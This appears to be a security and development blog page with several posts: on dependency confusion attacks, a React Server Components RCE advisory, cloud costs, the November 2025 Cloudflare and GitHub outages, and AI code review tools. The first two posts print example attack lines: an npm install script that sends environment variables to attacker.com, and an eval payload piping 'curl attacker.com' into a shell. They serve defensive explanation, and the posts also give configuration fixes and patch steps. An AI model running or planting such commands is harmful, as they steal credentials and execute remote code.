Jacob Alcock - Security & Development

Dependency Confusion Attacks: How Package Names Steal Your Code

Jacob Alcock — Tue, 06 Jan 2026 10:27:15 GMT

Dependency confusion attacks happen because package managers default to checking public registries, even when you're using private packages. Attackers upload malicious code with internal package names. Your CI/CD pulls and executes attacker code.

The fix is simple: configure package managers correctly. Most companies don't.

How Dependency Confusion Works

Step 1: Company uses internal packages

Company has private npm packages for shared code:

@mycompany/auth
@mycompany/api-client
@mycompany/utils

These live in a private npm registry (JFrog Artifactory, npm Enterprise, AWS CodeArtifact).

Step 2: Developer configuration

package.json:

{
  "dependencies": {
    "@mycompany/auth": "^1.2.3",
    "express": "^4.18.0"
  }
}

Step 3: Attacker discovers internal package names

Via:

Leaked package.json in public GitHub repos
Error messages mentioning package names
Former employees disclosing names
Social engineering

Step 4: Attacker publishes to public npm

Attacker creates @mycompany/auth on public npm with version 999.999.999.

Step 5: Package manager downloads attacker's package

npm (without proper configuration) checks public registry. Finds @mycompany/auth@999.999.999 (higher version than internal 1.2.3). Downloads and installs malicious package.

Step 6: Code execution

Package has install script:

{
  "scripts": {
    "install": "curl https://attacker.com/steal?data=$(env)"
  }
}

On npm install, this executes. Attacker gets:

Environment variables (API keys, tokens, credentials)
Source code access (if running in CI/CD)
Network access to internal systems

Alex Birsan Research

Alex Birsan demonstrated this attack in 2021, earning $130k in bug bounties.

Targets: Over 35 companies including Apple, Microsoft, Netflix, Yelp, Tesla

Method:

Identified internal package names from public sources
Published packages to public npm/PyPI with same names
Used high version numbers (999.999.999) to ensure precedence
Added telemetry to track installations
Reported to affected companies

Results:

Thousands of downloads from major tech companies
Code executed in CI/CD pipelines
Access to internal networks, credentials, source code
$130k in bounty payouts

This wasn't a sophisticated exploit. It was package manager configuration doing exactly what it was told to do - just not what companies intended.

Why Package Managers Do This

npm behavior:

npm install @mycompany/auth

npm checks (in order):

Local cache
Configured registries
Public npm registry (default)

If @mycompany/auth exists in public npm with a higher version than private registry, npm installs the public version.

pip behavior (Python):

pip install company-internal-package

pip checks configured repositories. If not found, checks PyPI. If both have the package, highest version wins.

RubyGems, Maven, NuGet: Similar behavior. Public registries are default or fallback.

This isn't a bug. It's designed behavior. The problem is companies don't configure registry precedence correctly.

Why This Persists

Default configurations are insecure

Out of the box, package managers check public registries. Developers must explicitly configure private registry precedence.

Most don't.

No namespace protection

Anyone can publish @yourcompany/package-name to public npm. Package managers don't verify ownership.

npm scopes (@scopename) don't provide security. They're just namespaces. Attackers can create packages within any scope.

Version number precedence

Package managers use semantic versioning. 999.999.999 beats 1.2.3.

Attackers exploit this by publishing absurdly high version numbers.

Lack of awareness

Developers don't understand package manager resolution order. They assume "we use a private registry" means package managers won't check public registries.

Wrong.

CI/CD inherits developer configurations

Developer machine might be configured correctly. CI/CD pipeline uses a generic Docker image with default npm config.

CI/CD pulls from public registry. Attacker code executes in pipeline with access to production credentials.

No auditing

Companies don't monitor which registries packages are downloaded from. Malicious packages get installed without detection.

Attack Scenarios

Scenario 1: CI/CD credential theft

Company uses @mycompany/deploy-utils for deployment scripts. Package has access to AWS credentials in environment variables.

Attacker publishes malicious @mycompany/deploy-utils to public npm. CI/CD pipeline installs it. postinstall script exfiltrates AWS credentials to attacker server.

Attacker has production AWS access.

Scenario 2: Source code exfiltration

Internal package @company/build-tools runs during build. Has access to entire source code.

Attacker publishes malicious version. Build process installs it. Package uploads source code to attacker server.

Company IP is stolen.

Scenario 3: Backdoor deployment

Package @company/auth-middleware is used in production applications.

Attacker publishes malicious version with backdoor. Next deployment pulls attacker package. Backdoor ships to production.

Production compromised.

npm Scope

npm scopes like @mycompany seem like they provide isolation. They don't.

npm install @mycompany/auth

This will install from public npm if that package exists there, regardless of whether you have a private registry with the same package.

The fix:

.npmrc:

@mycompany:registry=https://private-registry.company.com

This tells npm: "For packages in @mycompany scope, only use this registry."

Most companies don't configure this.

pip’s Problem

Python's pip has similar issues with PyPI.

Attack:

pip install company-internal-utils

If company-internal-utils exists on both private repository and PyPI, pip might install from PyPI depending on configuration.

The fix:

pip.conf:

[global]
index-url = https://private-repo.company.com/simple/

Or use --index-url flag explicitly.

Again, most companies rely on default behavior.

Detection

How do you know if you're vulnerable?

Do you use internal packages?
Are those package names secret or publicly known?
Is your package manager configured to prioritise private registry?
Are CI/CD pipelines configured the same as developer machines?

If you answer "I don't know" to any of these, you're probably vulnerable.

Monitoring:

Check where packages are downloaded from:

npm config get registry

Audit installed packages against expected sources. But this requires tooling most companies don't have.

Final Thoughts

Dependency confusion is a simple attack with devastating impact. It exploits default package manager behavior that most developers don't understand.

The fix is trivial: configure registry precedence correctly. Most companies don't because:

Complexity
Lack of awareness
No ownership
Works until it doesn't

Alex Birsan made $130k in bounties demonstrating this. How many attackers have exploited it without disclosing?

You're probably vulnerable right now. Your build pipelines are likely pulling packages from public registries without verification.

Check your .npmrc. If you don't have scope restrictions configured, you're one package name discovery away from being compromised.

The supply chain attack surface is massive. Dependency confusion is one of the easiest exploits.

Fix your package manager configs. Before someone else publishes @yourcompany/auth-utils to public npm.

Critical Vulnerability in React Server Components (CVE-2025-55182)

Jacob Alcock — Wed, 03 Dec 2025 00:00:00 GMT

UPDATE: December 3, 2025 - A critical pre-authentication Remote Code Execution (RCE) vulnerability has been disclosed in React Server Components. This is a CVSS 10.0 vulnerability. If you're running Next.js 15.x, 16.x, or React 19.x in production, stop reading and patch immediately.

The Issue

Affected:

React 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js 15.x and 16.x (all versions using App Router)
Experimental canary releases starting with Next.js 14.3.0-canary.77

Patched versions:

React: 19.0.1, 19.1.2, 19.2.1
Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Vulnerability: Pre-authentication remote code execution via unsafe deserialisation in Server Function endpoints

CVSS Score: 10.0 (Critical)

CVE ID: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

How to Update

If you're using Next.js:

# Check your current version
npm list next

# Update to the latest patched version for your major version
npm install next@15.5.7  # For Next.js 15.x
npm install next@16.0.7  # For Next.js 16.x

# Verify the update
npm list next

If you're using React directly with Server Components:

# Update to patched React versions
npm install react@19.2.1 react-dom@19.2.1

# Also update the affected server packages
npm install react-server-dom-webpack@19.2.1
npm install react-server-dom-turbopack@19.2.1
npm install react-server-dom-parcel@19.2.1

If you're on Next.js 14.3 canary builds:

# Either downgrade to stable 14.x
npm install next@14.2.18

# Or downgrade to 14.3.0-canary.76 (last safe canary)
npm install next@14.3.0-canary.76

# Or upgrade to a patched 15.x/16.x version
npm install next@15.5.7

After updating, redeploy immediately. This isn't a "next deploy cycle" patch.

What Happened?

React Server Components introduced a new attack surface: Server Functions (also called Server Actions in Next.js). These are functions you can call from the client that execute on the server.

Here's the simplified architecture:

// app/actions.js
'use server'

export async function saveData(formData) {
  // This runs on the SERVER
  const data = formData.get('data');
  await db.save(data);
}

// app/page.js
'use client'

import { saveData } from './actions'

export default function Page() {
  return (
    <form action={saveData}>
      <input name="data" />
      <button>Savebutton>
    form>
  )
}

When the user submits the form, the client sends an HTTP POST request to a special endpoint on your Next.js server. The server deserialises the request payload and executes the saveData function.

The Vulnerability

The deserialisation process in React 19.0.0–19.2.0 unsafely deserialises untrusted HTTP payloads without proper validation.

An attacker can craft a malicious payload that, when deserialised, executes arbitrary code on your server.

Why This Is a 10.0 CVSS (The Worst Possible Score)

CVSS 10.0 requires meeting these criteria:

✅ Attack Vector: Network (AV:N) - Exploitable remotely over HTTP
✅ Attack Complexity: Low (AC:L) - No special conditions required
✅ Privileges Required: None (PR:N) - No authentication needed (pre-auth RCE)
✅ User Interaction: None (UI:N) - Fully automated attack
✅ Scope: Changed (S:C) - Can compromise beyond the vulnerable component
✅ Confidentiality Impact: High (C:H) - Full data exfiltration possible
✅ Integrity Impact: High (I:H) - Full system compromise possible
✅ Availability Impact: High (A:H) - Complete denial of service possible

An unauthenticated attacker can send a single HTTP request to your publicly accessible Next.js application and execute arbitrary code on your server. They can:

Read environment variables (API keys, database credentials, secrets)
Execute system commands
Install backdoors
Exfiltrate your entire database
Pivot to other services on your network
Mine cryptocurrency
Ransom your data

And they can do all of this without needing an account or any interaction from your users.

This is as bad as it gets.

How the Exploit Works

The Vulnerable Code Path

React Server Components serialise function arguments and return values using a custom serializstion format. When you call a Server Function from the client:

Client serialises the arguments into a special payload format
Client sends HTTP POST to /_next/data/... (Next.js) or your Server Function endpoint
Server deserialises the payload ← THE VULNERABILITY IS HERE
Server executes the function with the deserialised arguments
Server serialises the return value and sends it back

The vulnerability is in step 3. The affected React packages (react-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel) deserialise the incoming payload without properly validating the data structure.

Deserialisation Vulnerabilities

Unsafe deserialisation is CWE-502, one of the most dangerous vulnerability classes in web security. Here's why:

When you deserialise data, you're reconstructing an object from a serialised representation. If the deserialiser doesn't validate the structure, an attacker can craft a payload that:

Instantiates dangerous classes
Calls methods during object construction
Triggers code execution through property setters or getters
Exploits prototype pollution (in JavaScript)

Classic example (simplified):

// Unsafe deserialization
function deserialize(payload) {
  return eval('(' + payload + ')');  
}

// Attacker sends:
deserialize("({toString: () => require('child_process').exec('curl attacker.com | sh')})")

The React vulnerability is more sophisticated than eval(), but the principle is the same. Untrusted input is used to construct code or objects without validation.

Why Server Functions Are High-Risk Targets

Server Functions are attractive targets because:

Public endpoints: They're automatically exposed as HTTP endpoints
No built-in rate limiting: Easy to brute-force or DoS
Direct server access: Code executes in the same process as your app
Environment variable access: Can read process.env immediately
No WAF signatures: This is a new attack surface with no existing WAF rules

If you're using Server Functions for authentication, database writes, or API calls, an attacker can:

Bypass authentication by calling the function directly
Inject malicious data into your database
Abuse your API keys to attack third-party services

Who Is Affected?

You ARE affected if:

You're running Next.js 15.x or 16.x in production (any version)
You're running Next.js 14.3.0-canary.77 or later canary builds
You're using React 19 with a custom Server Components setup (Remix, Waku, etc.)
You're using the App Router in Next.js (the vulnerability is in Server Functions, which are App Router only)

You are NOT affected if:

You're on Next.js 14.x stable (14.0.0 through 14.2.x)
You're on Next.js 13.x or earlier
You're using React 18 or earlier
You're using Pages Router only (no App Router, no Server Components)
You're using React 19 with RSC but none of the affected bundlers (unlikely)

Why This Vulnerability Existed

Server Components are brand new. React 19 was released in December 2024 (stable) after years in alpha/beta. Next.js 15 shipped in October 2024.

The React team built a novel serialisation protocol to handle:

Client-to-server function calls
Server-to-client streaming of RSC payloads
Promises, symbols, and complex object graphs
References between client and server

This is hard. Really hard. And the security implications weren't fully understood when the feature shipped.

This is not a criticism of the React team. They responsibly disclosed the vulnerability, shipped patches quickly, and published detailed advisories. This is how responsible disclosure should work.

But it's a reminder: new features = new attack surface.

What Next.js and React Could Have Done Better

(This is a learning opportunity, not an attack on the teams involved.)

1. Server Functions Should Have Been Opt-In

Server Functions are on by default if you use 'use server'. This means every Next.js 15+ App Router application has this attack surface, even if developers don't realize it.

Better approach:

// next.config.js
module.exports = {
  experimental: {
    serverActions: true  // Opt-in
  }
}

Make dangerous features opt-in, not opt-out.

2. Rate Limiting Should Be Built-In

There's no built-in rate limiting for Server Functions. An attacker can make thousands of requests per second trying different payloads.

Recommended:

Default rate limit: 100 requests/minute per IP
Configurable in next.config.js
Automatically enabled for all Server Functions

3. Content Security Policy for Server Function Payloads

The server should validate the Content-Type and payload structure before deserializing.

Example:

// Validate before deserializing
if (req.headers['content-type'] !== 'application/x-server-function') {
  return res.status(400).send('Invalid content type');
}

if (payload.length > MAX_PAYLOAD_SIZE) {
  return res.status(413).send('Payload too large');
}

4. Security Docs Should Be Prominent

The Next.js documentation should have a Security section that covers:

Server Functions are public HTTP endpoints
Input validation is required
Authentication is not automatic
Rate limiting is your responsibility

This information exists but is buried. It should be in the main Server Functions guide.

Final Thoughts

Server Components are powerful. They enable features that were impossible or impractical before:

True server-client composition
Streaming HTML
Zero-bundle components
Direct database access from components

But power comes with responsibility. The security model of React fundamentally changed with Server Components, and the ecosystem is still learning the implications.

If you take one thing away from this article: Update to the patched versions immediately. This is a pre-auth RCE with a 10.0 CVSS score. Attackers are scanning for vulnerable Next.js apps right now.

Don't be the next breach headline.

Official advisories:

Cloud Costs Are Destroying Startup Margins

Jacob Alcock — Sat, 29 Nov 2025 13:02:03 GMT

AWS bills that exceed engineering salaries are normal now. Startups with 100,000 users paying $50,000/month for infrastructure that could run on a $200/month dedicated server.

Cloud infrastructure is convenient. It's also absurdly expensive once you move beyond toy projects. And the costs compound in ways that aren't obvious until you're locked in.

The Real Cost Comparison

Scenario: A typical SaaS startup with 100k users, ~500GB database, moderate traffic

AWS:

RDS (db.r5.xlarge): $500/month
EC2 instances (3x m5.large for redundancy): $450/month
Load balancer: $25/month
Data transfer out: $500-2,000/month (depending on traffic)
S3 storage and requests: $200/month
CloudFront: $100/month
Backups, snapshots, logs: $150/month
Monitoring, alerts: $50/month

Monthly total: $2,000-3,500/month

Hetzner dedicated server (AX102):

CPU: AMD Ryzen 9 7950X (16 cores)
RAM: 128GB
Storage: 2x 3.84TB NVMe SSD
Bandwidth: Unlimited at 1Gbit/s

Monthly total: €200 (~$220/month)

The AWS bill is 10-15x higher for comparable resources. And that's before costs balloon with scale.

Hidden Costs

Cloud vendors bury costs in fees most startups don't anticipate.

Data transfer (egress) fees

AWS charges $0.09/GB for data transfer out. Seems small until you do the math:

100k daily active users
Average 5MB per session
500GB/day = 15TB/month
15TB × $0.09 = $1,350/month just for bandwidth

Hetzner: Included. No egress fees.

Cross-region transfer

Moving data between AWS regions costs $0.02/GB. If your database is in us-east-1 and your app servers are in us-west-2, every query costs money.

NAT Gateway

Need private subnets to access the internet? $0.045/GB processed + $0.045/hour. Easily $50-100/month for basic usage.

Load balancer fees

Application Load Balancer: $0.0225/hour + $0.008/LCU. Minimum ~$16/month, realistically $25-50/month.

Reserved instances trap

"Save 30-60% by committing to reserved instances!"

You commit to 1-3 year contracts. Your usage patterns change. You're stuck paying for resources you don't need while also paying for the resources you actually use.

Support fees

Basic support: Free (but useless, 24-hour response time for production issues) Developer: $29/month minimum or 3% of AWS bill Business: $100/month or 10% of AWS bill (minimum for 1-hour response)

If your monthly bill is $10,000, business support costs $1,000/month on top of that.

Compounding Cost

Cloud costs don't scale linearly. They compound.

Example progression:

Month 1-6 (MVP): $200/month - single small instance, small database Month 7-12 (early traction): $800/month - added load balancer, bigger database, redundancy Month 13-18 (growing): $3,500/month - multi-region, CDN, caching layer, monitoring Month 19-24 (scaling): $15,000/month - auto-scaling, managed services, increased traffic Month 25+ (mature): $50,000+/month - everything costs more at scale

Revenue might grow 10x. Infrastructure costs grow 250x.

Why Startups Use Cloud Anyway

If cloud is so expensive, why does everyone use it?

Speed to market

Provisioning a server takes minutes on AWS. Buying hardware takes weeks. Early-stage startups optimize for speed, not cost.

No upfront capital

Buying servers requires cash. AWS is OpEx, not CapEx. Startups short on cash choose monthly bills over hardware purchases.

Scaling flexibility

Need 10x capacity for a product launch? Spin up instances. Traffic drops after? Scale down. With owned hardware, you're stuck with excess capacity.

Managed services

RDS handles database backups and failover. S3 handles file storage. Lambda handles compute. No DevOps engineer needed (initially).

Investor expectations

VCs expect startups to use cloud infrastructure. Saying "we run on bare metal" raises questions about scalability.

Developer preference

Engineers want AWS/GCP/Azure on their resume. Managing physical servers feels outdated.

When Cloud Costs Break Startups

The breaking point comes when infrastructure costs exceed engineering salaries.

Real example (anonymised):

SaaS company, $2M ARR, 15 employees

Engineering team (5 people): $750k/year
AWS bill: $960k/year

Infrastructure costs more than the team building the product.

Gross margin: 52% (should be 80%+ for SaaS) Path to profitability: Unclear because AWS costs grow faster than revenue

The Margin Destruction

Typical SaaS metrics:

Target gross margin: 80%+
Customer acquisition cost: $500-2,000
Lifetime value: $5,000-20,000

When cloud costs consume 40-50% of revenue:

Gross margin: 50-60%
Less capital for growth
Longer path to profitability
Less attractive to investors/acquirers

Cloud vendors effectively tax your revenue at 30-50%. And the tax rate increases with scale.

Repatriation

Companies are moving off cloud to save money.

37signals (Basecamp, Hey):

Moved off cloud, saved $7 million over 5 years. Bought hardware, colocated in data centers. Margins improved dramatically.

Dropbox:

Moved storage off AWS to owned infrastructure. Saved $75 million over 2 years.

Discord:

Moved from MongoDB Atlas to ScyllaDB on owned hardware. Saved millions annually while improving performance.

The pattern is that companies hit scale, realise cloud costs are destroying margins, migrate to owned infrastructure.

Migration

"Just move off cloud" sounds simple. It's not.

Vendor lock-in

Built with AWS Lambda, API Gateway, DynamoDB, and SQS? That's AWS-specific. Migration requires rewriting.

Operational complexity

Moving to owned infrastructure means:

Managing hardware failures
Handling network issues
Maintaining security
Scaling manually
Hiring DevOps/SRE team

Upfront costs

Buying servers and colocation contracts requires capital. Startups operating on VC runway don't have it.

Risk

Cloud providers have SLAs. Owned infrastructure means you're responsible for uptime. One mistake costs customers.

Time

Migration takes months. Engineering time spent migrating isn't spent building features. Opportunity cost is massive.

What I Do

For early-stage projects: I use cloud. Speed matters.

For projects with revenue: I run numbers monthly. When cloud costs hit 15-20% of revenue, I start planning migration.

For established projects: Hybrid approach. Owned infrastructure for predictable workloads, cloud for spikes and backups.

I don't pay AWS for bandwidth that's free elsewhere. I don't pay for managed services I can run myself. I don't commit to reserved instances.

Final Thoughts

Cloud infrastructure is a tool. It's not a requirement.

Early on, cloud makes sense: fast provisioning, no upfront costs, managed services. The cost is worth the speed.

At scale, cloud is a tax on your revenue. Companies with mature products running on AWS are often paying 10-15x what the same infrastructure costs elsewhere.

The migration path exists. It's just painful, which is exactly why cloud vendors designed it that way.

If your AWS bill exceeds your engineering salaries, you have a problem. If your gross margins are below 70% because of infrastructure costs, you're building a less profitable business than necessary.

Cloud vendors have successfully convinced the industry that expensive infrastructure is inevitable. It's not. It's a choice.

Choose deliberately.

When Cloudflare and GitHub Go Down on the Same Day: The Internet's Fragile Foundation

Jacob Alcock — Thu, 20 Nov 2025 22:02:07 GMT

November 18, 2025: Cloudflare goes down at 7am ET. X, ChatGPT, Spotify, Zoom, and thousands of other sites become unreachable. 20% of the internet stops working.

Four hours later, Cloudflare comes back up.

Then GitHub goes down. Git operations fail globally. Developers can't push code. CI/CD pipelines break. Deployments stop.

Two critical internet infrastructure providers failing on the same day. Millions of users affected. Billions in productivity lost.

This isn't a coincidence. It's the inevitable result of an internet built on a handful of single points of failure.

What Happened: Cloudflare

The Outage:

Started: ~11:30 GMT / 7:00 AM ET
Resolved: 14:30 UTC (~4 hour duration)
Cause: Auto-generated configuration file grew beyond expected size, crashed threat management system
Impact: Sites returning 500 errors, timeouts, Cloudflare error pages

Sites Affected:

X (Twitter)
ChatGPT
Claude
Spotify
Zoom
Canva
Amazon (some services)
Thousands more

Even Downdetector - the site people visit to check if other sites are down - went down.

Root Cause:

Cloudflare CTO Dane Knecht explained the failure:

"The root cause of the outage was a configuration file that is automatically generated to manage threat traffic. The file grew beyond an expected size of entries and triggered a crash in the software system that handles traffic for a number of Cloudflare's services. The Cloudflare team was able to diagnose the issue and revert to a previous version of the file which restored services as of 14:30 UTC. There is no evidence of an attack or malicious activity causing the issue."

Translation: An auto-generated config file for threat management grew too large. The software couldn't handle it. It crashed. That crash cascaded through Cloudflare's network. Everything broke.

Not an attack. Not malicious. Just a config file that grew beyond expected size and took down 20% of the internet.

What Happened: GitHub

Hours later, same day:

GitHub Status: "Git Operations is experiencing degraded availability."

Users seeing:

fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.

Impact:

Can't clone repos
Can't push code
Can't pull updates
CI/CD pipelines blocked
Deployments stopped

Multiple accounts, multiple orgs, multiple repos. Global impact.

Two critical infrastructure providers. Same day. Unrelated failures.

The Single Point of Failure

Cloudflare powers 20% of all websites

Think about that. One company. One fifth of the internet.

When Cloudflare crashes, 20% of the web becomes unreachable. Not because those sites crashed. Because the infrastructure protecting and routing to those sites crashed.

GitHub hosts the majority of open source and enterprise code

Most companies use GitHub for source control. When GitHub goes down:

Developers can't work
Deployments stop
CI/CD breaks
Open source grinds to a halt

The consolidation problem:

The internet runs on a handful of companies:

Cloudflare (CDN, DDoS protection, DNS)
AWS (cloud infrastructure)
Microsoft Azure (cloud infrastructure)
Google Cloud (cloud infrastructure)
GitHub (source control)
Fastly (CDN)

When any of these have problems, significant chunks of the internet break.

Why This Keeps Happening

Within one month alone:

AWS outage (October 20)
Microsoft Azure outage (days after AWS)
Cloudflare outage (November 18)
GitHub outage (November 18, same day as Cloudflare)

Four major infrastructure providers. Four outages. One month.

Professor David Choffnes (Northeastern University):

"We now have AWS, Azure and Cloudflare outages in the span of a month. That's a very large portion of the biggest cloud providers in the world. It has not been the case that we have seen major outages like this in a short period of time."

This isn't normal. But it's becoming normalized.

Why Companies Rely on These Services

Cost

Building your own CDN: Millions in infrastructure, operations, staff.

Using Cloudflare: Free tier or $20-200/month.

Building your own Git infrastructure: Servers, backups, reliability engineering.

Using GitHub: $0-$21/user/month.

The economics are obvious.

Expertise

Cloudflare has 330 data centers globally. 13,000 networks directly connected.

Most companies can't build that. Even if they could, it would cost more than using Cloudflare.

DDoS protection

Cloudflare's primary value: protecting sites from DDoS attacks.

DDoS attacks can cost millions in downtime. Cloudflare prevents them for $20/month.

But when Cloudflare goes down, sites become unreachable anyway. The irony is thick.

Network effects

GitHub has the code. Developers use GitHub. Companies hire developers who know GitHub. Everyone uses GitHub.

Switching to GitLab, Bitbucket, or self-hosted Git means retraining, migration cost, and losing ecosystem integrations.

Lock-in is real.

The Latent Bug Problem

Cloudflare's outage was caused by a "latent bug" - a bug that existed in production but wasn't detected until a specific condition triggered it.

How this happens:

Code has bug
Bug doesn't manifest under normal conditions
Bug passes testing
Bug ships to production
Months/years pass
Configuration change or traffic pattern triggers bug
Service crashes
Cascading failure takes down everything

Why testing doesn't catch it:

Testing simulates normal conditions. Latent bugs manifest under abnormal conditions - edge cases, specific configurations, unusual traffic patterns.

You can't test for every possible scenario. Some bugs hide until production triggers them.

The cascade problem:

Bug in bot mitigation service crashed that service. That service is critical to other services. Those services crashed. Those services were critical to more services. Cascade.

Modern distributed systems have interdependencies. One failure propagates everywhere.

The Apology

Cloudflare CTO Dane Knecht posted on LinkedIn:

"I won't mince words: earlier today we failed our customers and the broader Internet when a problem in Cloudflare's network impacted large amounts of traffic that rely on us. The sites, businesses, and organizations that rely on Cloudflare depend on us being available and I apologize for the impact that we caused... That issue, impact it caused, and time to resolution is unacceptable. Work is already underway to make sure it does not happen again, but I know it caused real pain today. The trust our customers place in us is what we value the most and we are going to do what it takes to earn that back."

Cloudflare's formal statement:

"We apologise to our customers and the Internet in general for letting you down today. Given the importance of Cloudflare's services, any outage is unacceptable."

Cloudflare's importance makes outages unacceptable. But outages will happen anyway. The apology is sincere. It also doesn't prevent the next outage.

Why This Won't Get Fixed

No alternative exists

You can't avoid Cloudflare by using... what? Build your own global CDN?

For most companies, that's not realistic.

Diversification is expensive

Using multiple CDN providers means:

Double the cost
Complex failover logic
More things to manage
Still vulnerable if primary provider fails and failover is slow

The market rewards consolidation

Cloudflare wins because they're the biggest, cheapest, most feature-rich option.

Smaller competitors can't match their scale or price.

Market concentration increases. Single point of failure risk increases.

Regulatory inaction

Governments could regulate critical internet infrastructure. Require redundancy, disaster recovery, testing standards.

They don't. Cloudflare is a private company. Regulators don't care until something catastrophic happens.

Cost of downtime vs cost of prevention

Cloudflare's 4-hour outage cost the internet billions.

But Cloudflare's cost was minimal:

No SLA violations for most customers (free tier has no SLA)
Stock down 3%, recovered quickly
No regulatory penalty
No lawsuits with teeth

The GitHub Timing

GitHub going down the same day as Cloudflare is probably coincidence.

But it illustrates the problem: we have no redundancy.

When GitHub is down, there's no "backup GitHub." You just wait.

When Cloudflare is down, there's no failover. Sites just show errors.

Why no backup:

Maintaining GitHub failover means:

Mirroring all repos to another provider
Keeping mirrors in sync
Switching workflows when GitHub is down
Training developers on two systems

Cost and complexity aren't worth it for most companies. So they accept the risk.

The AWS/Azure/Cloudflare Trifecta

In one month:

AWS outage knocked out 1,000+ sites
Azure outage followed days later
Cloudflare outage took down 20% of the internet

Professor Timothy Edgar (Brown University):

"This is another alarming example of how dependent we have become on critical internet infrastructure, and how little the government is doing to hold big companies accountable."

The consolidation timeline:

2010: Many CDN providers, diverse cloud infrastructure 2015: Market consolidating around AWS, Cloudflare, Azure 2020: Three companies dominate cloud infrastructure 2025: Internet runs on a handful of companies; outages affect billions

Consolidation was economically rational for companies. Disastrous for internet resilience.

The Irony

Cloudflare's primary product: DDoS protection. Keeping sites online during attacks.

Cloudflare's outage: Made sites unreachable. Same result as DDoS.

The tool meant to prevent downtime caused downtime.

From Alp Toker (NetBlocks):

"What's striking is how much of the internet has had to hide behind Cloudflare infrastructure to avoid denial of service attacks in recent years. [It] has become one of the internet's largest single points of failure."

We built internet infrastructure to prevent attacks from taking down sites.

Instead we created infrastructure that can take down sites without any attack.

The Truth

The internet is fragile because it's consolidated.

20% of websites depend on one company. Most code is hosted by one company. Most cloud infrastructure is split between three companies.

When any of these fail, significant chunks of the internet stop working.

This happens because:

Consolidation is economically efficient
Building alternatives is expensive
Network effects create lock-in
Regulation doesn't require resilience

November 18, 2025 had two major outages. Same day. Unrelated causes. Both critical infrastructure.

This will happen again. More frequently. Because the internet's foundation is built on single points of failure, and nobody with the power to fix it has an incentive to do so.

What we're told: "Incidents are unacceptable. We're working to prevent them."

What will happen: More incidents. More apologies. No structural change.

The internet runs on a handful of companies. When they fail, the internet fails.

We've optimized for cost and convenience. We've sacrificed resilience.

November 18 was a reminder of that trade-off.

The next reminder is coming. We just don't know when.

Timeline:

7:00 AM ET / 11:30 GMT: Cloudflare outage begins
10:30 AM ET / 14:30 UTC: Cloudflare services restored
3:39 PM ET: GitHub Git operations begin failing
Same day: Two critical infrastructure providers down, millions affected

The internet's fragility has never been clearer.

AI Code Review Tools Are Making Code Worse

Jacob Alcock — Fri, 14 Nov 2025 23:04:36 GMT

AI code review tools promise to catch bugs before they hit production. In practice, they're creating a false sense of security while making it easier to ship bad code.

The problem isn't that AI code review doesn't work at all. It's that it works just well enough to be dangerous.

False Security

When you have an AI tool that flags 20 issues in a PR, and 18 of them are noise, developers learn to ignore them. The two real issues get lost in the noise. This is worse than no automated review at all.

Traditional code review works because there's accountability. A human reviewer stakes their reputation on approving code. They know if they approve something that breaks production, it reflects on them. AI tools have no such incentive.

The result: developers treat AI code review as a checkbox. "The bot approved it" becomes justification for merging without actual human review.

What AI Code Review Actually Catches

Linting issues - things your IDE already flagged
Style violations - whitespace, formatting, naming conventions
Simple pattern matching - detecting banned functions or obvious anti-patterns
Surface-level type errors - things TypeScript/mypy would catch anyway

What it doesn't catch:

Logic errors - off-by-one errors, incorrect conditionals, race conditions
Security vulnerabilities - SQL injection, XSS, authentication bypasses (unless they match exact training patterns)
Architecture issues - this function shouldn't exist, wrong abstraction, tight coupling
Business logic bugs - the code does what it says, but what it says is wrong
Context-dependent problems - this change breaks an assumption made elsewhere

The entire value of code review comes from catching the second category. AI tools are optimised for the first.

Training Data

AI code review tools are trained on existing codebases. Existing codebases are full of bugs. The model learns to accept buggy code because that's what it was trained on.

The model has no way to know if code it was trained on later caused production incidents. It treats "code that was merged" as "good code" when in reality it just means "code that someone approved."

This is the same fundamental flaw as LLM model collapse. The training data is contaminated with the exact problems the tool is supposed to prevent.

Alert Fatigue

I've seen AI code review tools flag the following as "security issues":

Using JSON.parse() (flagged as potential RCE)
Any SQL query (flagged as potential injection, even with parameterised queries)
eval() in a test file
setTimeout with a variable delay (flagged as timing attack)

Every single one was a false positive. When developers see 15 false positives per PR, they stop reading the AI's feedback. The one real SQL injection vulnerability gets merged because nobody takes the bot seriously anymore.

Speed

AI code review tools are marketed on speed. "Get feedback in seconds, not hours!" This optimises for the wrong metric.

Code review isn't slow because humans type slowly. It's slow because understanding context takes time. Reading the related code, understanding the business logic, thinking through edge cases - none of this can be rushed.

AI tools optimise for fast feedback. Developers optimise for getting code merged. The combination produces code that passes automated checks but doesn't actually work correctly.

Economics

Companies buy AI code review tools for two reasons:

To reduce headcount - fewer senior engineers needed if AI does code review
To ship faster - remove the bottleneck of waiting for human reviewers

Both reasons directly conflict with code quality. You're replacing experienced judgment with pattern matching, and adding pressure to merge quickly.

The incentives are clear: vendors sell speed and cost reduction, companies buy those metrics, and code quality suffers. Nobody's incentive is aligned with "catch more bugs."

What Works

The solution isn't better AI code review. It's better human code review.

Pair programming - real-time review catches issues before they're even committed
Small PRs - easier to review thoroughly, less likely to hide bugs
Domain expertise - reviewers who understand the system, not just the syntax
Accountability - reviewers whose names are attached to what they approve
Time - allowing reviewers to actually think through the changes

None of these scale as well as AI code review. That's the point. Code review shouldn't scale. If you're merging so much code that human review is a bottleneck, you have a process problem, not a tooling problem.

The Truth

AI code review tools exist because companies want to ship faster with fewer experienced engineers. The tools work well enough to justify the purchase, but not well enough to actually improve code quality.

What you get is:

Junior developers who think the AI caught all the issues
Senior developers who ignore the AI because of alert fatigue
Management who sees "100% of PRs reviewed by AI" as a quality metric
Production incidents that would have been caught by a human reviewer

The feedback loop ensures this gets worse over time. AI-approved code trains the next version of the AI. Bad code becomes the baseline.

What I Do

I don't use AI code review tools on projects I care about. I use:

Linters - for style and simple pattern matching (what AI code review actually does well)
Static analysis - language-specific tools that understand semantics, not just syntax
Human reviewers - people who understand the system and business logic
Tests - including the weird edge cases AI tools never think to check

Is it slower? Yes. Does it catch more bugs? Absolutely.

The industry has spent the last decade optimising for development speed. We've gotten very fast at shipping bugs to production. Maybe it's time to optimise for correctness instead.

Final Thoughts

AI code review isn't useless. It's worse than useless - it creates the illusion of thorough review while making it easier to ship bad code.

The problem isn't the technology. It's that the technology is being used to replace judgment with pattern matching, and accountability with automation.

